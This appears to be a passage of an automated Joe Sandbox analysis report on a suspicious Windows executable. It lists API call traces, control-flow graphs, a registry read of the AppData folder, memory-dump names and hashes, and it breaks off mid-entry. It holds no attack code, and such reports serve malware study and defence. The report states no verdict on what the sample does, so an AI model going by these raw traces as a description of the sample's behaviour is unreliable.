                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DestroyWindow
                                                                                                                                                        • String ID: D$FSCommand:$\fscommand$allowscale$exec$fullscreen$quit$showmenu$trapallkeys
                                                                                                                                                        • API String ID: 3375834691-1928458085
                                                                                                                                                        • Opcode ID: 8e8d82514e9d8b960081925372c41b61d7cb84f965052bb5de2fbd8ea45d4c2e
                                                                                                                                                        • Instruction ID: 7647b0b3e504c4bbb0374484e0d8b702cf2a7569de5a553b4a60fd35f403e9ef
                                                                                                                                                        • Opcode Fuzzy Hash: 8e8d82514e9d8b960081925372c41b61d7cb84f965052bb5de2fbd8ea45d4c2e
                                                                                                                                                        • Instruction Fuzzy Hash: 27914C35504B015BCB24EF28EC617FBB791AFA6309F44451FE8888B341DB2A990BC7D9

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 004DB511
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 004DB531
                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 004DB541
                                                                                                                                                        • SetWindowLongA.USER32(?,000000F0,?), ref: 004DB55D
                                                                                                                                                        • GetMenu.USER32(?), ref: 004DB581
                                                                                                                                                        • SetMenu.USER32(?,00000000), ref: 004DB596
                                                                                                                                                        • GetDesktopWindow.USER32 ref: 004DB5B0
                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 004DB5BC
                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000000,?,?,?,?,?,?,004D5D9E,00000000), ref: 004DB5E1
                                                                                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 004DB604
                                                                                                                                                        • SetWindowLongA.USER32(?,000000F0,?), ref: 004DB62A
                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,?,?,?,004D5D9E,00000000), ref: 004DB66D
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 004DB6A5
                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 004DB6B7
                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,?,?,004D5D9E,00000000), ref: 004DB702
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Rect$Long$ClientMenuMove$Desktop
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3087884050-0
                                                                                                                                                        • Opcode ID: b644bd01d25a479bd3a154174cbb076086dd9edafcd01cccc19a768557d6cf23
                                                                                                                                                        • Instruction ID: afb7dc4107877f96dc9ff69242aee4b267e14dc018c2a581ac30f1de2d6509eb
                                                                                                                                                        • Opcode Fuzzy Hash: b644bd01d25a479bd3a154174cbb076086dd9edafcd01cccc19a768557d6cf23
                                                                                                                                                        • Instruction Fuzzy Hash: 1C61F7756047009FE714CF79D888FA7B7E9EB98314F108A1EE5AA83344DE74B8088B65

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 730 4cfe40-4cfe62 731 4cfe68-4cfe6d call 497d20 730->731 732 4cffe0-4cfffd RegOpenKeyExA 730->732 739 4cfe6f call 4cb0e0 731->739 734 4cffff-4d002b RegQueryValueExA 732->734 735 4d0049-4d0059 732->735 737 4d002d-4d0039 call 435020 734->737 738 4d003e-4d0042 734->738 737->738 741 4d0043 RegCloseKey 738->741 742 4cfe74-4cfe76 739->742 741->735 743 4cfe7c-4cfe99 RegOpenKeyExW 742->743 744 4cff3f-4cff5c RegOpenKeyExA 742->744 743->735 745 4cfe9f-4cfecb RegQueryValueExW 743->745 744->735 746 4cff62-4cff8e RegQueryValueExA 744->746 745->738 747 4cfed1-4cfee3 call 4b8350 745->747 748 4cffd9-4cffde 746->748 749 4cff90-4cff93 746->749 747->738 756 4cfee9-4cfeec 747->756 748->741 751 4cffc8-4cffd4 call 435020 749->751 752 4cff95-4cffa9 call 4b8440 749->752 751->748 752->748 758 4cffab-4cffc6 call 435020 call 439d00 752->758 759 4cfeee-4cff04 call 435020 call 439d00 756->759 760 4cff09-4cff1e call 4d9d70 call 439d00 756->760 758->741 759->738 760->738 773 4cff24-4cff3a call 435020 call 439d00 760->773 773->738
                                                                                                                                                        APIs
                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,00000000,?,?,?,?,?,?,?,?,0041D80B,?,?), ref: 004CFE8F
                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,AppData,00000000,?,?,?,?,?,?,?,?,?,?,?,0041D80B,?), ref: 004CFEC1
                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,00000000,?,?,?,?,?,?,?,?,0041D80B,?,?), ref: 004CFF52
                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,AppData,00000000,?,?,?,?,?,?,?,?,?,?,?,0041D80B,?), ref: 004CFF84
                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,00000000,?,?,?,?,?,?,?,?,0041D80B,?,?), ref: 004CFFF3
                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,AppData,00000000,?,?,?,?,?,?,?,?,?,?,?,0041D80B,?), ref: 004D0021
                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,0041D80B,?,?), ref: 004D0043
                                                                                                                                                          • Part of subcall function 004CB0E0: GetVersionExA.KERNEL32 ref: 004CB0FB
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: OpenQueryValue$CloseVersion
                                                                                                                                                        • String ID: AppData$AppData$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                        • API String ID: 3944000476-502054578
                                                                                                                                                        • Opcode ID: 8db32938d79705165cc268b6cef819a2b1932c4d39244d564a2eda060a3e5bcd
                                                                                                                                                        • Instruction ID: f72081d33d1e3e5e856db847e9c33e0e25e3821136d69a0383b26c3c547fa845
                                                                                                                                                        • Opcode Fuzzy Hash: 8db32938d79705165cc268b6cef819a2b1932c4d39244d564a2eda060a3e5bcd
                                                                                                                                                        • Instruction Fuzzy Hash: 0151B2715087017BC725DB50EC95FAB73E8AF88754F00891EF98553381EAB9D80AC7AA

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 949 4f5fc0-4f5fd7 950 4f5fdd-4f5ff0 call 4f5cb0 949->950 951 4f6093-4f6095 949->951 965 4f605d-4f6065 950->965 966 4f5ff2-4f6058 call 4fe010 950->966 952 4f60f7-4f60f9 951->952 953 4f6097-4f609f 951->953 955 4f60ff-4f6101 952->955 956 4f61a1 952->956 957 4f60b2-4f60ba 953->957 958 4f60a1-4f60a6 953->958 960 4f6107-4f6148 EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection call 4f2bf0 955->960 961 4f62e5-4f62ec 955->961 956->961 963 4f61a7-4f61a9 956->963 957->952 964 4f60bc-4f60be 957->964 958->957 962 4f60a8-4f60b0 958->962 979 4f614a 960->979 980 4f6167-4f6174 call 4f2bf0 960->980 962->957 962->964 963->961 969 4f61af-4f61c2 call 4f24f0 963->969 970 4f60d3 964->970 971 4f60c0-4f60c5 964->971 965->951 967 4f6067-4f607c EnterCriticalSection 965->967 966->965 973 4f607e 967->973 974 4f6085-4f608d LeaveCriticalSection 967->974 983 4f624e-4f625b call 4f24f0 969->983 984 4f61c8-4f61ce 969->984 978 4f60d9-4f60f2 call 4e5ec0 970->978 971->970 977 4f60c7-4f60d1 971->977 973->974 974->951 977->970 977->978 978->952 982 4f6150-4f6165 call 4f3d00 call 4f2bf0 979->982 980->961 992 4f617a 980->992 982->980 983->961 1001 4f6261 983->1001 989 4f61d0-4f61df EnterCriticalSection 984->989 996 4f61e6-4f61ef 989->996 997 4f61e1 989->997 1000 4f6180-4f6195 call 4f3d00 call 4f2bf0 992->1000 998 4f6201-4f620a 996->998 999 4f61f1-4f61ff 996->999 997->996 1003 4f6211-4f622b LeaveCriticalSection EnterCriticalSection 998->1003 999->1003 1021 4f6197-4f619e 1000->1021 1005 4f6267-4f6276 EnterCriticalSection 1001->1005 1007 4f622d-4f6233 1003->1007 1008 4f6240-4f624c LeaveCriticalSection 1003->1008 1010 4f627d-4f6286 1005->1010 1011 4f6278 1005->1011 1012 4f623a-4f623d 1007->1012 1013 4f6235-4f6238 1007->1013 1008->983 1008->989 1015 4f6298-4f62a1 1010->1015 1016 4f6288-4f6296 1010->1016 1011->1010 1012->1008 1013->1008 1017 4f62a8-4f62c2 LeaveCriticalSection EnterCriticalSection 1015->1017 1016->1017 1019 4f62d7-4f62e3 LeaveCriticalSection 1017->1019 1020 4f62c4-4f62ca 1017->1020 1019->961 1019->1005 1022 4f62cc-4f62cf 1020->1022 1023 4f62d1-4f62d4 1020->1023 1022->1019 1023->1019
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,004F732F,?), ref: 004F606E
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F608D
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,004F732F,?), ref: 004F6111
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F611B
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F612B
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F6135
                                                                                                                                                          • Part of subcall function 004F5CB0: EnterCriticalSection.KERNEL32(?,?,?,?,?,004F5FEB,?,00000000,?,?,00000000,?), ref: 004F5CC0
                                                                                                                                                          • Part of subcall function 004F5CB0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F5CCE
                                                                                                                                                          • Part of subcall function 004F5CB0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F5CDE
                                                                                                                                                          • Part of subcall function 004F5CB0: LeaveCriticalSection.KERNEL32(?), ref: 004F5D07
                                                                                                                                                          • Part of subcall function 004F5CB0: EnterCriticalSection.KERNEL32(?), ref: 004F5D48
                                                                                                                                                          • Part of subcall function 004F5CB0: LeaveCriticalSection.KERNEL32(?), ref: 004F5D56
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000002,?,?,00000000,?,?,?,?,?,?,004F732F,?), ref: 004F61D1
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F6212
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F621C
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F6244
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000001,00000002,?,?,00000000,?,?,?,?,?,?,004F732F,?), ref: 004F6268
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F62A9
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F62B3
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F62DB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                        • Opcode ID: 7e8666cb07b5cacadf35492099d50c0e827f2b9a1fadfb76ea06a7d0beb11ddf
                                                                                                                                                        • Instruction ID: 143f1fb28292c6c8f5848ec82d72cb0c1768edffe3cb57bca7300ec5568bca4f
                                                                                                                                                        • Opcode Fuzzy Hash: 7e8666cb07b5cacadf35492099d50c0e827f2b9a1fadfb76ea06a7d0beb11ddf
                                                                                                                                                        • Instruction Fuzzy Hash: 2AA1113020430E8BC725DF349854BBBBBB9AF94304F15056EFA5687382DB79E809CB65
                                                                                                                                                        APIs
                                                                                                                                                        • StartDocA.GDI32(?,00000000), ref: 004D7F29
                                                                                                                                                        • GetDeviceCaps.GDI32(?,00000008), ref: 004D7F47
                                                                                                                                                        • GetDeviceCaps.GDI32(?,0000000A), ref: 004D7F55
                                                                                                                                                        • LPtoDP.GDI32(00000000,00000002), ref: 004D7F83
                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000006E), ref: 004D7FA0
                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000006F), ref: 004D7FAE
                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 004D7FBC
                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004D7FD2
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CapsDevice$Start
                                                                                                                                                        • String ID: portrait
                                                                                                                                                        • API String ID: 1738886688-2504013051
                                                                                                                                                        • Opcode ID: 87bb50d4ff0b2b6bcd955025618aa84fe9db738b10e38e5fb2dd326402729996
                                                                                                                                                        • Instruction ID: 78bfa520cedcb1c13f518f393ea8421dc938ea51f70754ce75912898c89e0c82
                                                                                                                                                        • Opcode Fuzzy Hash: 87bb50d4ff0b2b6bcd955025618aa84fe9db738b10e38e5fb2dd326402729996
                                                                                                                                                        • Instruction Fuzzy Hash: 7641DFB0604B109FC324DF2AD980A1AFBF5BF98710F108A1EE58A877A1D771E845CF91
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000,?,00000000,00000000,?,004AC0BD,?,?), ref: 004F705A
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F7081
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F709A
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F70A3
                                                                                                                                                        • timeGetTime.WINMM(00000000,00000000,00000000,00000000,?), ref: 004F7390
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?), ref: 004F73D5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$Leave$Enter$Timetime
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4022644143-0
                                                                                                                                                        • Opcode ID: 619e67b58965c9b6edfd0f45f913366b2bb88d2215bcce8f286a8ccc74bc94e1
                                                                                                                                                        • Instruction ID: 3d57daaa4b40982c2e4bbac1192c2a7fdd3e5fb289d79a2cbb097eeb1d58369f
                                                                                                                                                        • Opcode Fuzzy Hash: 619e67b58965c9b6edfd0f45f913366b2bb88d2215bcce8f286a8ccc74bc94e1
                                                                                                                                                        • Instruction Fuzzy Hash: 60A12B303083495BC7259F398890BBBBBE59F85700F04456EFA9AC7392DB6CE905D768
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000000,?,004712C5,/go/settmgr_locsecy_,?), ref: 004CBBB7
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 004CBBC9
                                                                                                                                                        • GetSystemDefaultLangID.KERNEL32 ref: 004CBBD7
                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 004CBBE4
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$AddressDefaultFreeLangLoadProcSystem
                                                                                                                                                        • String ID: GetUserDefaultUILanguage$kernel32.dll$zh-CN$zh-TW
                                                                                                                                                        • API String ID: 4093128580-2467112630
                                                                                                                                                        • Opcode ID: 3d939128caeb4f4a0c2a3e1391e0404935b02da9d145a63f7b898458335e617f
                                                                                                                                                        • Instruction ID: 32edacdcee4e875539d91fbc6b6cd0e564fa17a214d6f4638376f3859b545aac
